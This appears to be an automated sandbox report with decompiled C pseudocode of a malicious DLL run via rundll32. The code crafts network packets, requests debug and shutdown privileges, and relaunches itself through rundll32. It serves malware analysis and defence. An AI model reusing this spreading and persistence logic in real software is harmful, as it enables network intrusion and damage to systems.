                                                                                                                                                                                        													 *((short*)(_t248 + 0xf)) = ( *(_t251 + 0x59) & 0x000000ff) +  *((intOrPtr*)(_t251 + 0x8c));
                                                                                                                                                                                        													_t205 = 2;
                                                                                                                                                                                        													 *((short*)(_t248 + 0x11)) = _t205;
                                                                                                                                                                                        													if(E007B33A4(_t229, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t205) == 0) {
                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                        													} else {
                                                                                                                                                                                        														 *(_a12 + 0x22) = _v20;
                                                                                                                                                                                        														goto L21;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L38:
                                                                                                                                                                                        													HeapFree(GetProcessHeap(), 8, _a8);
                                                                                                                                                                                        													goto L13;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L41;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                                                        												if(_t248 != 0) {
                                                                                                                                                                                        													 *((intOrPtr*)(_t248 + 8)) = 1;
                                                                                                                                                                                        													 *((intOrPtr*)(_t248 + 0x18)) = 1;
                                                                                                                                                                                        													 *_t248 = 0x12;
                                                                                                                                                                                        													 *((intOrPtr*)(_t248 + 4)) = 0;
                                                                                                                                                                                        													 *((intOrPtr*)(_t248 + 0xc)) = 0;
                                                                                                                                                                                        													 *((intOrPtr*)(_t248 + 0x10)) = 0;
                                                                                                                                                                                        													 *((intOrPtr*)(_t248 + 0x14)) = 0;
                                                                                                                                                                                        													 *((intOrPtr*)(_t248 + 0x1c)) = 0x48;
                                                                                                                                                                                        													 *((intOrPtr*)(_t248 + 0x20)) = ( *(_t251 + 0x88) & 0x0000ffff) + ( *(_t251 + 0x59) & 0x000000ff);
                                                                                                                                                                                        													_t218 = 2;
                                                                                                                                                                                        													 *((short*)(_t248 + 0x25)) = _t218;
                                                                                                                                                                                        													if(E007B3209( *(_t251 + 0x59) & 0x000000ff, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t218) != 0) {
                                                                                                                                                                                        														L21:
                                                                                                                                                                                        														_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L22:
                                                                                                                                                                                        													HeapFree(GetProcessHeap(), 8, _t248);
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L23:
                                                                                                                                                                                        											if(_v8 == 0) {
                                                                                                                                                                                        												Sleep(0x7d0);
                                                                                                                                                                                        												_t249 = HeapAlloc(GetProcessHeap(), 8, 0x29);
                                                                                                                                                                                        												if(_t249 != 0) {
                                                                                                                                                                                        													_t172 = 4;
                                                                                                                                                                                        													 *((intOrPtr*)(_t249 + 4)) = _t172;
                                                                                                                                                                                        													 *((intOrPtr*)(_t249 + 0xc)) = _t172;
                                                                                                                                                                                        													 *((intOrPtr*)(_t249 + 0x14)) = _t172;
                                                                                                                                                                                        													_t173 = 5;
                                                                                                                                                                                        													 *((short*)(_t249 + 0x25)) = _t173;
                                                                                                                                                                                        													_t174 = 7;
                                                                                                                                                                                        													 *(_t249 + 0x27) = _t174;
                                                                                                                                                                                        													 *_t249 = 0x13;
                                                                                                                                                                                        													 *((intOrPtr*)(_t249 + 0x18)) = 0x4c;
                                                                                                                                                                                        													_t233 = _a8;
                                                                                                                                                                                        													 *((short*)(_a8 + 3)) =  *_a16;
                                                                                                                                                                                        													_t245 =  *(_t249 + 0x27) & 0x0000ffff;
                                                                                                                                                                                        													_v24 = ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
                                                                                                                                                                                        													_v8 = E007B32AF(_a4, _a12, ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff, _t249, _a8,  *(_t249 + 0x27) & 0x0000ffff);
                                                                                                                                                                                        													HeapFree(GetProcessHeap(), 8, _t249);
                                                                                                                                                                                        													_v8 = 0xbadf00d;
                                                                                                                                                                                        													if(_v8 == 0x10002) {
                                                                                                                                                                                        														_t253 = _a16;
                                                                                                                                                                                        														if(E007B3680(_t233, _a4, _a12, _v24,  *_a16 & 0x0000ffff, _v16,  &_v12) != 0 && E007B41E9(_t233, _t245, _a4,  &_a12,  *_t253 & 0x0000ffff,  &_v12) != 0) {
                                                                                                                                                                                        															_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														_t251 = _v12;
                                                                                                                                                                                        													} else {
                                                                                                                                                                                        														if(((0 | _v16 == 0x00000000) & (0 | 1 ==  *_t251) & (0 | _a20 == 0x00000005)) != 0) {
                                                                                                                                                                                        															 *_t251 = 0;
                                                                                                                                                                                        															goto L28;
                                                                                                                                                                                        														}
                                                                                                                                                                                        													}
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L41:
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L13:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t251);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        				goto L41;
                                                                                                                                                                                        			}
























                                                                                                                                                                                        0x007b4820
                                                                                                                                                                                        0x007b4823
                                                                                                                                                                                        0x007b4826
                                                                                                                                                                                        0x007b4829
                                                                                                                                                                                        0x007b482c
                                                                                                                                                                                        0x007b482f
                                                                                                                                                                                        0x007b4832
                                                                                                                                                                                        0x007b4835
                                                                                                                                                                                        0x007b484b
                                                                                                                                                                                        0x007b484e
                                                                                                                                                                                        0x007b4853
                                                                                                                                                                                        0x007b486c
                                                                                                                                                                                        0x007b486e
                                                                                                                                                                                        0x007b486e
                                                                                                                                                                                        0x007b486e
                                                                                                                                                                                        0x007b4872
                                                                                                                                                                                        0x007b4878
                                                                                                                                                                                        0x007b4878
                                                                                                                                                                                        0x007b481b
                                                                                                                                                                                        0x007b487e
                                                                                                                                                                                        0x007b4882
                                                                                                                                                                                        0x007b488d
                                                                                                                                                                                        0x007b48a0
                                                                                                                                                                                        0x007b48a4
                                                                                                                                                                                        0x007b48ac
                                                                                                                                                                                        0x007b48af
                                                                                                                                                                                        0x007b48b2
                                                                                                                                                                                        0x007b48b5
                                                                                                                                                                                        0x007b48b8
                                                                                                                                                                                        0x007b48bb
                                                                                                                                                                                        0x007b48bf
                                                                                                                                                                                        0x007b48c0
                                                                                                                                                                                        0x007b48c7
                                                                                                                                                                                        0x007b48ca
                                                                                                                                                                                        0x007b48eb
                                                                                                                                                                                        0x007b48ee
                                                                                                                                                                                        0x007b48f2
                                                                                                                                                                                        0x007b4900
                                                                                                                                                                                        0x007b490e
                                                                                                                                                                                        0x007b4914
                                                                                                                                                                                        0x007b4921
                                                                                                                                                                                        0x007b4928
                                                                                                                                                                                        0x007b4a52
                                                                                                                                                                                        0x007b4a70
                                                                                                                                                                                        0x007b4a8a
                                                                                                                                                                                        0x007b4a8a
                                                                                                                                                                                        0x007b4a8e
                                                                                                                                                                                        0x007b492e
                                                                                                                                                                                        0x007b494e
                                                                                                                                                                                        0x007b4956
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b4956
                                                                                                                                                                                        0x007b494e
                                                                                                                                                                                        0x007b4928
                                                                                                                                                                                        0x007b48a4
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b4882
                                                                                                                                                                                        0x007b4800
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b47e7
                                                                                                                                                                                        0x007b4756
                                                                                                                                                                                        0x007b4743
                                                                                                                                                                                        0x007b473f
                                                                                                                                                                                        0x007b47b1
                                                                                                                                                                                        0x007b47b7
                                                                                                                                                                                        0x007b47b7
                                                                                                                                                                                        0x007b4ab2
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 007B46E4
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B46E7
                                                                                                                                                                                          • Part of subcall function 007B2497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24AF
                                                                                                                                                                                          • Part of subcall function 007B2497: HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24B8
                                                                                                                                                                                          • Part of subcall function 007B2497: GetProcessHeap.KERNEL32(00000008,00001124,74654F20,?,?,?,007B471C,?,?,?,?,?), ref: 007B24CD
                                                                                                                                                                                          • Part of subcall function 007B2497: HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B24D0
                                                                                                                                                                                          • Part of subcall function 007B2497: rand.MSVCRT ref: 007B24E1
                                                                                                                                                                                          • Part of subcall function 007B2497: htons.WS2_32(00001120), ref: 007B24FF
                                                                                                                                                                                          • Part of subcall function 007B2497: rand.MSVCRT ref: 007B255F
                                                                                                                                                                                          • Part of subcall function 007B2497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,007B471C,?,?,?,?,?), ref: 007B2576
                                                                                                                                                                                          • Part of subcall function 007B2497: HeapAlloc.KERNEL32(00000000,?,?,?,007B471C,?,?,?,?,?), ref: 007B257D
                                                                                                                                                                                          • Part of subcall function 007B2497: htons.WS2_32(0000015C), ref: 007B259F
                                                                                                                                                                                          • Part of subcall function 007B2497: rand.MSVCRT ref: 007B25CD
                                                                                                                                                                                        • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007B478F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 007B47B4
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B47B7
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B47F0
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B47F9
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000027), ref: 007B4810
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B4813
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 007B4875
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B4878
                                                                                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 007B488D
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000029), ref: 007B4897
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B489A
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 007B4911
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B4914
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000013), ref: 007B49D2
                                                                                                                                                                                          • Part of subcall function 007B2E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 007B2E32
                                                                                                                                                                                          • Part of subcall function 007B2E12: HeapAlloc.KERNEL32(00000000), ref: 007B2E3B
                                                                                                                                                                                          • Part of subcall function 007B2E12: GetProcessHeap.KERNEL32(00000008,00000048,74654F20), ref: 007B2E4D
                                                                                                                                                                                          • Part of subcall function 007B2E12: HeapAlloc.KERNEL32(00000000), ref: 007B2E50
                                                                                                                                                                                          • Part of subcall function 007B2E12: htons.WS2_32(00000044), ref: 007B2E68
                                                                                                                                                                                          • Part of subcall function 007B2E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 007B2EF3
                                                                                                                                                                                          • Part of subcall function 007B2E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 007B2F0B
                                                                                                                                                                                          • Part of subcall function 007B2E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B2F31
                                                                                                                                                                                          • Part of subcall function 007B2E12: HeapFree.KERNEL32(00000000), ref: 007B2F38
                                                                                                                                                                                          • Part of subcall function 007B2E12: GetProcessHeap.KERNEL32(00000008,?), ref: 007B2F43
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B49D5
                                                                                                                                                                                          • Part of subcall function 007B3680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74654F20,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B3698
                                                                                                                                                                                          • Part of subcall function 007B3680: HeapAlloc.KERNEL32(00000000,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36A1
                                                                                                                                                                                          • Part of subcall function 007B3680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36B1
                                                                                                                                                                                          • Part of subcall function 007B3680: HeapAlloc.KERNEL32(00000000,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36B4
                                                                                                                                                                                          • Part of subcall function 007B3680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36C7
                                                                                                                                                                                          • Part of subcall function 007B3680: HeapAlloc.KERNEL32(00000000,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B36CA
                                                                                                                                                                                          • Part of subcall function 007B3680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,007B4A6E,?,?,?,?,00000000,?), ref: 007B37A2
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B4A96
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B4A99
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Alloc$Free$Sleephtonsrand$recvsend
                                                                                                                                                                                        • String ID: Uet0Xet
                                                                                                                                                                                        • API String ID: 3041643382-1689521831
                                                                                                                                                                                        • Opcode ID: 44e3cbb8ed28b1d007707cbb9185cc7818daa662d53b781e293c62ed4a1eef59
                                                                                                                                                                                        • Instruction ID: 3ec3e6a1c4cd084b6b12bb28805bde4cf198a1ddce6839d8a7c95247245c7302
                                                                                                                                                                                        • Opcode Fuzzy Hash: 44e3cbb8ed28b1d007707cbb9185cc7818daa662d53b781e293c62ed4a1eef59
                                                                                                                                                                                        • Instruction Fuzzy Hash: C6C1AB7540034AFADB10CFA4C804BEABBB5FF49304F108519F995DB691E738E950DBA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E007B79D7(void* __ebx, void* __ecx, void* __edi, char _a4, signed int _a8, char _a12, int _a16) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                        				struct _STARTUPINFOW _v92;
                                                                                                                                                                                        				char _v304;
                                                                                                                                                                                        				short _v1652;
                                                                                                                                                                                        				short _v1976;
                                                                                                                                                                                        				short _v3212;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                        				int _t78;
                                                                                                                                                                                        				char* _t84;
                                                                                                                                                                                        				char* _t85;
                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                        				char _t108;
                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                        				long _t120;
                                                                                                                                                                                        				signed char* _t121;
                                                                                                                                                                                        				long _t122;
                                                                                                                                                                                        				signed int _t124;
                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                        				intOrPtr* _t134;
                                                                                                                                                                                        				void* _t135;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                        				_push(_t128);
                                                                                                                                                                                        				E007B7897(__ecx, _t128);
                                                                                                                                                                                        				if(_a16 != 0xffffffff) {
                                                                                                                                                                                        					E007B923F(__ecx, _a4, _a8, _a12); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t60 = E007B7F04(); // executed
                                                                                                                                                                                        				if(_t60 != 0) {
                                                                                                                                                                                        					ExitProcess(0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t142 =  *0x7c7bc0 & 0x00000002;
                                                                                                                                                                                        				if(( *0x7c7bc0 & 0x00000002) != 0) {
                                                                                                                                                                                        					E007B7E8E(_t118, _t142); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				E007B84EE(); // executed
                                                                                                                                                                                        				E007B10A7(); // executed
                                                                                                                                                                                        				_a8 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_a16 = 0;
                                                                                                                                                                                        				_a4 = 0;
                                                                                                                                                                                        				__imp__#115(0x202, 0x7c81e0); // executed
                                                                                                                                                                                        				_t63 = E007B6C5F(0x24, E007B6AA8, 0, 0xffff); // executed
                                                                                                                                                                                        				 *0x7c7bb8 = _t63;
                                                                                                                                                                                        				 *0x7c7b80 = E007B6C5F(8, E007B67F9, E007B682F, 0xff);
                                                                                                                                                                                        				 *0x7c7b88 = 0;
                                                                                                                                                                                        				InitializeCriticalSection(0x7c7b9c);
                                                                                                                                                                                        				E007B652F(_t118, _a12); // executed
                                                                                                                                                                                        				E007B7DD0(_t118,  &_a8,  &_v8,  &_a16,  &_a4); // executed
                                                                                                                                                                                        				E007B8192(); // executed
                                                                                                                                                                                        				_t72 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                                                        				_v24.dwThreadId = _t72;
                                                                                                                                                                                        				CreateThread(0, 0, E007B8A6F, _t72, 0, 0); // executed
                                                                                                                                                                                        				if(( *0x7c7b7c & 0x00000002) != 0) {
                                                                                                                                                                                        					CreateThread(0, 0, E007B77D1, 0, 0, 0); // executed
                                                                                                                                                                                        					if(( *0x7c7bc0 & 0x00000002) != 0 && ( *0x7c7b7c & 0x00000001) != 0) {
                                                                                                                                                                                        						E007B7146(_t118, _t128); // executed
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E007B6CC8( *0x7c7b80);
                                                                                                                                                                                        					_t146 =  *0x7c7bc0 & 0x00000004;
                                                                                                                                                                                        					if(( *0x7c7bc0 & 0x00000004) != 0) {
                                                                                                                                                                                        						 *0x7c7b88 = E007B6C5F(4, E007B787C, 0, 0xff);
                                                                                                                                                                                        						_push( &_v304);
                                                                                                                                                                                        						_t108 = E007B85FB(_t146);
                                                                                                                                                                                        						if(_t108 != 0) {
                                                                                                                                                                                        							_t134 =  &_v304;
                                                                                                                                                                                        							_a12 = _t108;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								E007BA3B1(_t118,  *_t134);
                                                                                                                                                                                        								if(E007B796E(_t118,  *_t134) != 0) {
                                                                                                                                                                                        									E007B6E66(_t118,  *0x7c7b88, _t134, 0);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t134 = _t134 + 4;
                                                                                                                                                                                        								_t28 =  &_a12;
                                                                                                                                                                                        								 *_t28 = _a12 - 1;
                                                                                                                                                                                        							} while ( *_t28 != 0);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t128 =  *0x7c7b88;
                                                                                                                                                                                        					E007B6CC8(_t128);
                                                                                                                                                                                        					CreateThread(0, 0, E007BA1A9, 0, 0, 0); // executed
                                                                                                                                                                                        					E007BA420(_t118, _a16 * 0xea60); // executed
                                                                                                                                                                                        					Sleep(_a8 * 0xea60); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(( *0x7c7b7c & 0x00000010) != 0) {
                                                                                                                                                                                        					_t91 = E007B554A(_t118,  &(_v92.dwFlags), 0x21); // executed
                                                                                                                                                                                        					if(_t91 != 0) {
                                                                                                                                                                                        						_t132 = 0;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t121 = _t135 + _t132 - 0x2c;
                                                                                                                                                                                        							_t127 = 0x3e;
                                                                                                                                                                                        							_t124 = ( *_t121 & 0x000000ff) % _t127;
                                                                                                                                                                                        							_t132 = _t132 + 1;
                                                                                                                                                                                        							_t41 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + _t124; // 0x33323130
                                                                                                                                                                                        							 *_t121 =  *_t41;
                                                                                                                                                                                        						} while (_t132 < 0x20);
                                                                                                                                                                                        						_v24.dwProcessId = 0;
                                                                                                                                                                                        						E007B636B( &(_v92.dwFlags), _v24.dwThreadId); // executed
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				Sleep((_a4 + _v8) * 0xea60); // executed
                                                                                                                                                                                        				E007B8A23();
                                                                                                                                                                                        				asm("int3");
                                                                                                                                                                                        				_push(_t135);
                                                                                                                                                                                        				_push(_t128);
                                                                                                                                                                                        				_t78 = GetSystemDirectoryW( &_v1976, 0x30c);
                                                                                                                                                                                        				if(_t78 != 0) {
                                                                                                                                                                                        					_t78 = lstrcatW( &_v1652, L"\\rundll32.exe");
                                                                                                                                                                                        					if(_t78 != 0) {
                                                                                                                                                                                        						_t78 = GetModuleFileNameW( *0x7c7b98, 0x7c7bc8, 0x30c);
                                                                                                                                                                                        						if(_t78 != 0) {
                                                                                                                                                                                        							wsprintfW( &_v3212, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1652, PathFindFileNameW(0x7c7bc8), _a8);
                                                                                                                                                                                        							_t119 = 0x10;
                                                                                                                                                                                        							_t84 =  &_v24;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								 *_t84 = 0;
                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                        								_t119 = _t119 - 1;
                                                                                                                                                                                        							} while (_t119 != 0);
                                                                                                                                                                                        							_t122 = 0x44;
                                                                                                                                                                                        							_t120 = _t122;
                                                                                                                                                                                        							_t85 =  &_v92;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								 *_t85 = 0;
                                                                                                                                                                                        								_t85 = _t85 + 1;
                                                                                                                                                                                        								_t120 = _t120 - 1;
                                                                                                                                                                                        							} while (_t120 != 0);
                                                                                                                                                                                        							_v92.cb = _t122;
                                                                                                                                                                                        							_t78 = CreateProcessW( &_v1652,  &_v3212, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                                                                                                                                                                        							ExitProcess(0);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t78;
                                                                                                                                                                                        			}






























                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B7897: GetTickCount.KERNEL32 ref: 007B78AF
                                                                                                                                                                                          • Part of subcall function 007B7897: srand.MSVCRT ref: 007B78B2
                                                                                                                                                                                          • Part of subcall function 007B7897: GetTickCount.KERNEL32 ref: 007B78B9
                                                                                                                                                                                          • Part of subcall function 007B7897: GetModuleFileNameW.KERNEL32(007C7BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B7926
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 007B7A07
                                                                                                                                                                                          • Part of subcall function 007B923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,007B79FC,?,?,?), ref: 007B927B
                                                                                                                                                                                          • Part of subcall function 007B923F: memcpy.MSVCRT ref: 007B9294
                                                                                                                                                                                          • Part of subcall function 007B923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 007B9303
                                                                                                                                                                                          • Part of subcall function 007B923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 007B9323
                                                                                                                                                                                        • WSAStartup.WS2_32(00000202,007C81E0), ref: 007B7A3D
                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(007C7B9C,00000008,007B67F9,007B682F,000000FF,00000024,007B6AA8,00000000,0000FFFF), ref: 007B7A80
                                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 007B7AAD
                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,007B8A6F,00000000,00000000,00000000), ref: 007B7AC6
                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,007B77D1,00000000,00000000,00000000), ref: 007B7ADF
                                                                                                                                                                                          • Part of subcall function 007B7E8E: PathFileExistsW.KERNELBASE(?,?), ref: 007B7EB1
                                                                                                                                                                                          • Part of subcall function 007B7E8E: GetCurrentProcess.KERNEL32(?,?), ref: 007B7EC3
                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,007BA1A9,00000000,00000000,00000000), ref: 007B7B78
                                                                                                                                                                                          • Part of subcall function 007BA420: GetProcessHeap.KERNEL32(00000008,00000004,746543E0,?,00000000,?,?,007B7B89,000000FF), ref: 007BA436
                                                                                                                                                                                          • Part of subcall function 007BA420: HeapAlloc.KERNEL32(00000000,?,?,007B7B89,000000FF), ref: 007BA439
                                                                                                                                                                                          • Part of subcall function 007BA420: CreateThread.KERNELBASE ref: 007BA454
                                                                                                                                                                                          • Part of subcall function 007BA420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,007B7B89,000000FF), ref: 007BA463
                                                                                                                                                                                          • Part of subcall function 007BA420: HeapFree.KERNEL32(00000000,?,?,007B7B89,000000FF), ref: 007BA466
                                                                                                                                                                                        • Sleep.KERNELBASE(?,000000FF), ref: 007B7B93
                                                                                                                                                                                        • Sleep.KERNELBASE(?), ref: 007B7BEB
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B7C0E
                                                                                                                                                                                        • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 007B7C28
                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(007C7BC8,0000030C), ref: 007B7C43
                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(007C7BC8,?), ref: 007B7C51
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B7C6B
                                                                                                                                                                                        • CreateProcessW.KERNEL32 ref: 007B7CB3
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 007B7CBA
                                                                                                                                                                                          • Part of subcall function 007B554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 007B5561
                                                                                                                                                                                          • Part of subcall function 007B554A: GetLastError.KERNEL32(?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B556B
                                                                                                                                                                                          • Part of subcall function 007B554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B5581
                                                                                                                                                                                          • Part of subcall function 007B554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B558E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateProcess$FileHeapThread$CryptNameVirtual$AllocContextCountExitFreeModulePathSleepTick$AcquireCriticalCurrentDirectoryErrorEventExistsFindInitializeLastProtectRandomReleaseSectionStartupSystemlstrcatmemcpysrandwsprintf
                                                                                                                                                                                        • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                        			E007BA1A9() {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v12;
                                                                                                                                                                                        				signed int _v16;
